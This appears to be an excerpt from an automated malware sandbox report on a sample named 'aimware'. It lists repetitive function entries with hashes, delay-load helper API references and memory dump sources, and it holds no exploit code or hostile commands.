API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7683b746663391469df06a1e10a849b57a1965256bd836d620af79c527022ec3
Instruction ID: 691e917d823688964889dcb5164a3a920a98e01e9c013da6b9efdcc1ab870157
Opcode Fuzzy Hash: 7683b746663391469df06a1e10a849b57a1965256bd836d620af79c527022ec3
Instruction Fuzzy Hash: 77B012E23D9040BC3104D2061E02E37019CC2C2F20331853EF805D4180EC507F5A0931

Function 00ACE200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 76e583093ee82fd86b5b2ff74fa8f5a97d06e9dfc2fa74a5bc2e3b65bf67101d
Instruction ID: ed2adf2948288875d7b35692dd973cbed9d978073bef7382e04d71cf4504c3bd
Opcode Fuzzy Hash: 76e583093ee82fd86b5b2ff74fa8f5a97d06e9dfc2fa74a5bc2e3b65bf67101d
Instruction Fuzzy Hash: F6B012E2399180BC3144D2061D02E37019CC2C2F20331863EFC05C4180E8407E950931

Function 00ACE21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ef2052e8d7997e7c9b620a9d39a7502607670e1c0149f0e2870bfedf074450fc
Instruction ID: 1f84ad3bc785b3359c5849b9840b7ca51a3f5afac6561db4d7c66e972431396a
Opcode Fuzzy Hash: ef2052e8d7997e7c9b620a9d39a7502607670e1c0149f0e2870bfedf074450fc
Instruction Fuzzy Hash: AEB012F2299040BC3544D1061D02E3701DCC1C1F20331853EFC05C4080E840BF510931

Function 00ACE26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d602ede94d0c0cb05d099f16945f6d3c5fd737a2180b027336b8a3501a2a1196
Instruction ID: ad2472d32197c6502a15290e99938b5f2061fc66260aeb600c240b9d9d2d5fce
Opcode Fuzzy Hash: d602ede94d0c0cb05d099f16945f6d3c5fd737a2180b027336b8a3501a2a1196
Instruction Fuzzy Hash: E0B012E2299040BC3504D1561D02E3701DCC1C1F20331853EFC05C4080E840BE510931

Function 00ACE264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: aa2836d20ed6c271397f5ef0b75a46131d9c189c6d33d28c3537027012b6049a
Instruction ID: 5f8c5aea496f5b381ad90e0f01273a35eb31513ebfdaae554bbae93f7ece2e81
Opcode Fuzzy Hash: aa2836d20ed6c271397f5ef0b75a46131d9c189c6d33d28c3537027012b6049a
Instruction Fuzzy Hash: 9FB012E22AA080BC3104D1061D02E3701DDD5C0F30331453EF806C4080E8407F510931

Function 00ACE246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 33d43f62986bfe1c6156179cb7929a7fc77092dcfaed847a874673d99406e523
Instruction ID: c3f5dce0a266494130f5a4fdc8f25be31e6a2b17f99ade21f0ec3bb430e38367
Opcode Fuzzy Hash: 33d43f62986bfe1c6156179cb7929a7fc77092dcfaed847a874673d99406e523
Instruction Fuzzy Hash: 73B012E229A080BC3504D1071D02E37019DC1C1F30331853EFC05C4080E840BF510931

Function 00ACE250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ea08ce099ecbcc3acd1c0ce22389117af49cce1a381de98f2067c0d9fc3d0dd7
Instruction ID: 18c7ea9cef67e7e73020d86ab9dc79b6d1e5d0e058b1f2732d37f294f04997bc
Opcode Fuzzy Hash: ea08ce099ecbcc3acd1c0ce22389117af49cce1a381de98f2067c0d9fc3d0dd7
Instruction Fuzzy Hash: FAB012F229A180BC3144D2061D02E37019DC1C0F30331463EFC05C4080E8407F950931

Function 00ACE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE3FC

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3ac8c547527fb9541e2fcfe3f019e1155b91f3da9c39ee49aa4be3ba9c6d1c42
Instruction ID: 7089b2af2545749b93ad88173971380a24ddbe26fc69cc4817a7178fd7f21819
Opcode Fuzzy Hash: 3ac8c547527fb9541e2fcfe3f019e1155b91f3da9c39ee49aa4be3ba9c6d1c42
Instruction Fuzzy Hash: 21B012F22590C0BC3644D2051D07F3702DCC0C4F20331946EF804C5180E8405E410533

Function 00ACE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE3FC

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 66acb91920636c5e7c40b02b875050a9a43e23f1f062f1d545923bab0942cb0d
Instruction ID: 8fbed17ff1835716026d442f69d28ddc808916ededff947289476052b2dbc1cd
Opcode Fuzzy Hash: 66acb91920636c5e7c40b02b875050a9a43e23f1f062f1d545923bab0942cb0d
Instruction Fuzzy Hash: F1B012F23590C07C3204D2051E07F7702DCC1C5F20332D46EF504D5180E8401C4A0533

Function 00ACE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE3FC

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0001d39965412d72dedc396291bc65a08d0163a173c1a348657c829417a26854
Instruction ID: de2b52c83976beafb163640e2136736702013eb128f8b46d8c0a7edffce41e23
Opcode Fuzzy Hash: 0001d39965412d72dedc396291bc65a08d0163a173c1a348657c829417a26854
Instruction Fuzzy Hash: 3EB012F22590C0BC3604D2051D07F3702DCC1C5F20331D56EF804C5180E8405C450533

Function 00ACE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE580

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0efeb9bd9ebd3cc24a45f533d458d6bbcf2b8c6f8657d9f534d2f14138b02592
Instruction ID: a783ff0d3bff43242dffd497b0847341e02e7439f517b644a023b7911e6554e6
Opcode Fuzzy Hash: 0efeb9bd9ebd3cc24a45f533d458d6bbcf2b8c6f8657d9f534d2f14138b02592
Instruction Fuzzy Hash: 94B012D33A9040BC3104D1555F02E3701ACC0C0F20372562EF404D1080FC400E520631

Function 00ACE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE580

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 456641722ad27421fc088a1c2dc6c54ac033b78bec8f6138e849e98e98717bbb
Instruction ID: 1dcc76986ccd49cf291f3c5617f7a0292ba4430073d308d22cd6b86ef23ef796
Opcode Fuzzy Hash: 456641722ad27421fc088a1c2dc6c54ac033b78bec8f6138e849e98e98717bbb
Instruction Fuzzy Hash: 1DB012D3369140BC3144D1555E03E3701ACC0C0F20332562EF804C1080F8400D910631

Function 00ACE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE580

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e00f019fd5b83811932b51409109cbaccbdd6ea12331b1ae68b52d34f8898853
Instruction ID: 8a118e3ee105a86cd3dc8b9ca3727523b43cd1b8ed8158ad32b04e233b9961be
Opcode Fuzzy Hash: e00f019fd5b83811932b51409109cbaccbdd6ea12331b1ae68b52d34f8898853
Instruction Fuzzy Hash: BBB012D3369044BD3104D1551E02E37019CD0C0F20332546EF404C1080F8500D510631

Function 00ACE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE51F

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c580ea1edadcc855545f18934b81cc366b38d1bb49ebfe4535f488f804618969
Instruction ID: 4860dab0b58959036113d166eaf5233b69ed780cf87b8254eb8d67c8b191df81
Opcode Fuzzy Hash: c580ea1edadcc855545f18934b81cc366b38d1bb49ebfe4535f488f804618969
Instruction Fuzzy Hash: 86B012D26591807C3104D2091E06F3B05DCC0C5F20372946EF405C0080F8400C420531

Function 00ACE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE51F

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2dd8fa97f979118a4ee31785d537f7ed934e7d28d15920f1fed24ee807183715
Instruction ID: 85f4b8bdd9ad138be6d0c4dae9000ae411a6216279484aca43e1e32bb0558f8c
Opcode Fuzzy Hash: 2dd8fa97f979118a4ee31785d537f7ed934e7d28d15920f1fed24ee807183715
Instruction Fuzzy Hash: 34B012D26591407D3104D2091D06F3B01DCD0C5F20371546EF405C0080F8400C410531

Function 00ACE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE51F

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4fd77e8f0528a033bbd0e5cff420fcf8ee38651373a7454a058d95c405c263db
Instruction ID: 72a0e7465086afdb5719bf6325e5aaab07a5311dacd58caed414de3d029e4995
Opcode Fuzzy Hash: 4fd77e8f0528a033bbd0e5cff420fcf8ee38651373a7454a058d95c405c263db
Instruction Fuzzy Hash: 28B012D22591407C3104D2251D0AF3B019CD0C1F20771543EF415C0481F8400D450531

Function 00ACE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE51F

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 37c4e40d306d12732a49d60504cf5f7d37219153dd84fac7f571f0784be11e41
Instruction ID: 4192e0da637ad4a1385be8b7af6ccb68a1389cf44127b175c8cd57df71afd317
Opcode Fuzzy Hash: 37c4e40d306d12732a49d60504cf5f7d37219153dd84fac7f571f0784be11e41
Instruction Fuzzy Hash: 3EB012D22592407C3204D2095D07F3B05DCC0C5F20371562EF405C0080F8400D850531

Function 00ACE2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
